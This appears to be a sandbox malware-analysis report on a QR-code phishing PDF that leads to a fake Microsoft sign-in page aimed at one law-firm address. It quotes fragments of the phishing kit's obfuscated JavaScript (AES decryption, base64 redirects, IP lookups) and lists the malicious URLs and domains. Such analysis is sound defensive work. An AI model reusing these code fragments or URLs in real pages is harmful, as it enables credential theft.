Windows Analysis Report
scan3762399_arleen@wcctxlaw.com.pdf

Overview

General Information

Sample name: scan3762399_arleen@wcctxlaw.com.pdf
Analysis ID: 1554531
MD5: 55291e9f9037ee53a9605772fa7a5cf7
SHA1: a0af9b6b729afdf26c31f9e3dffed68896d28ff2
SHA256: 33b47fad1df53235b08cf678442a7ef0f87678a4f33212abafee24294fe1c490

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
HTML page contains suspicious javascript code
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 6912 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\scan3762399_arleen@wcctxlaw.com.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 5892 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6496 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1568,i,13921910073305481846,7220663622836480595,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://secure.adnxs.com/clktrb?id=273568&redir=https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1960,i,12773921235628740071,16150164899164501191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Phishing

Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | LLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'., The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain., The presence of a long, random-looking subdomain 'pub-ded8309031d344399056bf442a8ef815' is suspicious and not typical for Microsoft., The URL does not contain any direct reference to Microsoft, which is unusual for a legitimate Microsoft page. DOM: 1.3.pages.csv
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | LLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'., The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain., The presence of a password input field on a non-Microsoft domain is suspicious., The URL contains a long string of characters which is often used in phishing attempts to obfuscate the true nature of the site. DOM: 1.4.pages.csv
Source: https://emailavailabilitysecure.info/doc74387//#tarleen@wcctxlaw.com | HTTP Parser: window.location.href = atob(
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: Number of links: 0
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: Total embedded image size: 45708
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.9...
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: Title: Account sign in does not match URL
Source: https://emailavailabilitysecure.info/doc74387//#tarleen@wcctxlaw.com | HTTP Parser: let current_ip = null;function i5ond(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "kiuveb3cyxcn06kp72v+u6yooq/axvi/cei+iawui9bk3a9tdo89rabuecbaayeszbrgppktls0bjvhiwl+aog==";async function zcvhv() { try { const response = await fetch("https:/...
Source: https://emailavailabilitysecure.info/doc74387//#tarleen@wcctxlaw.com | HTTP Parser: let usuuid = "kiuveb3cyxcn06kp72v+u6yooq/axvi/cei+iawui9bk3a9tdo89rabuecbaayeszbrgppktls0bjvhiwl+aog=="; let policy = "pxmvmec2r2ugrndvjdt/6gp5msx1bwn4czrd0lm5xy9mvsoya3rymff+cnjdqdxc";let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.par...
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: <input type="password" .../> found
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: No favicon
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: No <meta name="author".. found
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 1MB later: 29MB
Source: global traffic | TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic | DNS traffic detected: DNS query: secure.adnxs.com
Source: global traffic | DNS traffic detected: DNS query: pub-ded8309031d344399056bf442a8ef815.r2.dev
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: emailavailabilitysecure.info
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: o365.alnassers.net
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: classification engine | Classification label: mal56.phis.winPDF@34/57@25/212
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6744
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 10-23-08-807.log
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\scan3762399_arleen@wcctxlaw.com.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1568,i,13921910073305481846,7220663622836480595,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://secure.adnxs.com/clktrb?id=273568&redir=https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1960,i,12773921235628740071,16150164899164501191,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding AC148DB0B131CFA25B5A4F900259FB86
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: scan3762399_arleen@wcctxlaw.com.pdf | Initial sample: PDF keyword /JS count = 0
Source: scan3762399_arleen@wcctxlaw.com.pdf | Initial sample: PDF keyword /JavaScript count = 0
Source: scan3762399_arleen@wcctxlaw.com.pdf | Initial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

Source: PDF document | LLM: PDF document contains QR code
Source: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | LLM: Page contains button: 'VIEW DOCUMENT' Source: '1.0.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information queried: ProcessInformation

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence: Browser Extensions (1); Scripting (1); Registry Run Keys / Startup Folder (1); Login Hook
Privilege Escalation: Process Injection (1); Registry Run Keys / Startup Folder (1); Extra Window Memory Injection (1); Login Hook
Defense Evasion: Masquerading (1); Process Injection (1); Deobfuscate/Decode Files or Information (1); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Process Discovery (1); System Information Discovery (1); Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (2); Protocol Impersonation
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
code.jquery.com | 151.101.194.137 | true | false | | high
cdnjs.cloudflare.com | 104.17.25.14 | true | false | | high
www.google.com | 142.250.185.100 | true | false | | high
api.ipify.org | 172.67.74.152 | true | false | | high
ib.anycast.adnxs.com | 185.89.210.141 | true | false | | high
emailavailabilitysecure.info | 164.92.90.203 | true | false | | unknown
o365.alnassers.net | 147.79.74.176 | true | false | | high
pub-ded8309031d344399056bf442a8ef815.r2.dev | 172.66.0.235 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
secure.adnxs.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com | true | | unknown

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false |
| 184.28.88.176 | unknown | United States | 16625 | AKAMAI-ASUS | false |
| 173.194.76.84 | unknown | United States | 15169 | GOOGLEUS | false |
| 185.89.210.141 | ib.anycast.adnxs.com | Germany | 29990 | ASN-APPNEXUS | false |
| 142.250.185.100 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 151.101.130.137 | unknown | United States | 54113 | FASTLYUS | false |
| 147.79.74.176 | o365.alnassers.net | United States | 208485 | EKSENBILISIMTR | false |
| 142.250.181.238 | unknown | United States | 15169 | GOOGLEUS | false |
| 2.23.197.184 | unknown | European Union | 1273 | CWVodafoneGroupPLCEU | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 142.250.185.131 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.185.142 | unknown | United States | 15169 | GOOGLEUS | false |
| 52.5.13.197 | unknown | United States | 14618 | AMAZON-AESUS | false |
| 142.250.186.131 | unknown | United States | 15169 | GOOGLEUS | false |
| 172.66.0.235 | pub-ded8309031d344399056bf442a8ef815.r2.dev | United States | 13335 | CLOUDFLARENETUS | true |
| 151.101.194.137 | code.jquery.com | United States | 54113 | FASTLYUS | false |
| 172.217.18.10 | unknown | United States | 15169 | GOOGLEUS | false |
| 164.92.90.203 | emailavailabilitysecure.info | United States | 46930 | ASN-DPSDUS | false |
| 199.232.210.172 | bg.microsoft.map.fastly.net | United States | 54113 | FASTLYUS | false |
| 104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false |
| 172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |

                          IP
                          192.168.2.16
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1554531
                          Start date and time:2024-11-12 16:22:36 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:18
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:scan3762399_arleen@wcctxlaw.com.pdf
                          Detection:MAL
                          Classification:mal56.phis.winPDF@34/57@25/212
                          Cookbook Comments:
                          • Found application associated with file extension: .pdf
                          • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.186.131, 142.250.181.238, 173.194.76.84, 184.28.88.176, 34.104.35.123
                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ssl-delivery.adobe.com.edgekey.net, xandr-g-geo.trafficmanager.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, geo2.adobe.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: scan3762399_arleen@wcctxlaw.com.pdf
                          InputOutput
                          URL: PDF document Model: claude-3-haiku-20240307
                          ```json
                          {
                            "contains_trigger_text": true,
                            "trigger_text": "Please use your smartphone camera to scan the QRcode be",
                            "prominent_button_name": "unknown",
                            "text_input_field_labels": "unknown",
                            "pdf_icon_visible": false,
                            "has_visible_captcha": false,
                            "has_urgent_text": true,
                            "has_visible_qrcode": true
                          }
                          ```
                          URL: PDF document Model: claude-3-haiku-20240307
                          ```json
                          {
                            "brands": [
                              "Microsoft Corporation"
                            ]
                          }
                          ```
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
                          {
                            "contains_trigger_text": true,
                            "trigger_text": "Please authenticate with your office credentials to access the document",
                            "prominent_button_name": "VIEW DOCUMENT",
                            "text_input_field_labels": "unknown",
                            "pdf_icon_visible": false,
                            "has_visible_captcha": false,
                            "has_urgent_text": false,
                            "has_visible_qrcode": false
                          }
                          ```
                          URL: Model: claude-3-5-sonnet-latest
                          {
                              "typosquatting": false,
                              "unusual_query_string": false,
                              "suspicious_tld": true,
                              "ip_in_url": false,
                              "long_subdomain": true,
                              "malicious_keywords": false,
                              "encoded_characters": false,
                              "redirection": false,
                              "contains_email_address": false,
                              "known_domain": false,
                              "brand_spoofing_attempt": false,
                              "third_party_hosting": true
                          }
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
                          {
                            "brands": []
                          }
                          ```
                          
                          The provided image does not contain any visible brand logos or names. The image appears to be a financial statement or document that requires authentication to view. There are no brand names or logos visible in the header, footer, or body of the document.
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
                          {
                            "contains_trigger_text": true,
                            "trigger_text": "Sign in",
                            "prominent_button_name": "Next",
                            "text_input_field_labels": [
                              "arleen@wcctxlaw.com"
                            ],
                            "pdf_icon_visible": false,
                            "has_visible_captcha": false,
                            "has_urgent_text": false,
                            "has_visible_qrcode": false
                          }
                          ```
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
                          {
                            "contains_trigger_text": true,
                            "trigger_text": "Because you're accessing sensitive info, you need to verify your password.",
                            "prominent_button_name": "Sign in",
                            "text_input_field_labels": [
                              "Password"
                            ],
                            "pdf_icon_visible": false,
                            "has_visible_captcha": false,
                            "has_urgent_text": false,
                            "has_visible_qrcode": false
                          }
                          ```
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
                          {
                            "brands": [
                              "Microsoft"
                            ]
                          }
                          ```
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: claude-3-haiku-20240307
                          ```json
                          {
                            "brands": [
                              "Microsoft"
                            ]
                          }
                          ```
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: gpt-4o
                          ```json
                          {
                            "legit_domain": "microsoft.com",
                            "classification": "wellknown",
                            "reasons": [
                              "The brand 'Microsoft' is classified as 'wellknown'.",
                              "The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'.",
                              "The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain.",
                              "The presence of a long, random-looking subdomain 'pub-ded8309031d344399056bf442a8ef815' is suspicious and not typical for Microsoft.",
                              "The URL does not contain any direct reference to Microsoft, which is unusual for a legitimate Microsoft page."
                            ],
                            "riskscore": 9
                          }
                          ```
                          Google indexed: False
                          URL: pub-ded8309031d344399056bf442a8ef815.r2.dev
                                      Brands: Microsoft
                                      Input Fields: arleen@wcctxlaw.com
                          URL: https://pub-ded8309031d344399056bf442a8ef815.r2.dev/derxydomainfreshlink.html#tarleen@wcctxlaw.com Model: gpt-4o
                          ```json
                          {
                            "legit_domain": "microsoft.com",
                            "classification": "wellknown",
                            "reasons": [
                              "The brand 'Microsoft' is classified as 'wellknown'.",
                              "The URL 'pub-ded8309031d344399056bf442a8ef815.r2.dev' does not match the legitimate domain 'microsoft.com'.",
                              "The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain.",
                              "The presence of a password input field on a non-Microsoft domain is suspicious.",
                              "The URL contains a long string of characters which is often used in phishing attempts to obfuscate the true nature of the site."
                            ],
                            "riskscore": 9
                          }
                          ```
                          Google indexed: False
                          URL: pub-ded8309031d344399056bf442a8ef815.r2.dev
                                      Brands: Microsoft
                                      Input Fields: Password
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):290
                          Entropy (8bit):5.204350537962087
                          Encrypted:false
                          SSDEEP:
                          MD5:CC76F0763ED2F636E51E9B5FE5708E9A
                          SHA1:B132043FF7E1DB645FFA15F318F2DB0E89126927
                          SHA-256:8D4C47274644818983DC70C3FE974B91E053740041A8631F845057C71054E58A
                          SHA-512:07E5A69AF9A97E79FA4B716D49AE85A8B69251BEFA77EB9F5C329832DE3EAFAE580C1CD47DE6EB668FB86C3973FCFEB9FF7ED4DE12D1B949829579BDD6068F7F
                          Malicious:false
                          Reputation:unknown
                          Preview:2024/11/12-10:23:07.153 1868 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-10:23:07.155 1868 Recovering log #3.2024/11/12-10:23:07.155 1868 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):334
                          Entropy (8bit):5.190356982058386
                          Encrypted:false
                          SSDEEP:
                          MD5:863EC6A33F06E6998A924A7E8FE9E72A
                          SHA1:5BCCD96F012E9D0BFB640F310DE55B912315D280
                          SHA-256:258CC4AEF5EEAA903CEECB79D1B0B7FD6282E0C12F397864C817E1CF981C5C77
                          SHA-512:16E3322976F472A23075A53598A959B210BD4C36243FE4DFFC6845C900EF1C8BADF8BFB2A7B189C28888771BD43FB1476ADD22C0BCF786ADB6BE3125AE67DE18
                          Malicious:false
                          Reputation:unknown
                          Preview:2024/11/12-10:23:07.035 1978 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-10:23:07.045 1978 Recovering log #3.2024/11/12-10:23:07.046 1978 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:1362BE6C4F27BA60B976E7FB09129BF9
                          SHA1:DF28132C18D84C8BE7473F0D009761D80D25FDBA
                          SHA-256:05FE7FA92E84680DEDDF1170B7A3C8D1F91D364B353EDE5AD0818B16E83941EB
                          SHA-512:9DE848A03BED65AAF31C9DA3BA1BE61B943062E7DC0E17B0BDBF345F82B12F93A00476A1B473E3BD0064A5E1D723EFE7D33082C498B811E10FED0F03C37771CA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375984992823415","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":227677},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):403
                          Entropy (8bit):4.985260378334126
                          Encrypted:false
                          SSDEEP:
                          MD5:1362BE6C4F27BA60B976E7FB09129BF9
                          SHA1:DF28132C18D84C8BE7473F0D009761D80D25FDBA
                          SHA-256:05FE7FA92E84680DEDDF1170B7A3C8D1F91D364B353EDE5AD0818B16E83941EB
                          SHA-512:9DE848A03BED65AAF31C9DA3BA1BE61B943062E7DC0E17B0BDBF345F82B12F93A00476A1B473E3BD0064A5E1D723EFE7D33082C498B811E10FED0F03C37771CA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375984992823415","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":227677},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4099
                          Entropy (8bit):5.23101909398753
                          Encrypted:false
                          SSDEEP:
                          MD5:DC1936462E75D18119754535988C425C
                          SHA1:C30B7EF60EE8F9B1D0465B1257D377FDB5DE19D9
                          SHA-256:04E4567D2EA4B1739418AB597A325367D788EA0A984AFBE6A568A8FAA0BCB3A1
                          SHA-512:C6E91783E76DC9E27D36046880D9F1D01B3A0CADC031F0C8D447580C541296A643973AB9CBA995E54E05F78D7F317BC25A716B0C9021DFCDEDE70F17D97F66F8
                          Malicious:false
                          Reputation:unknown
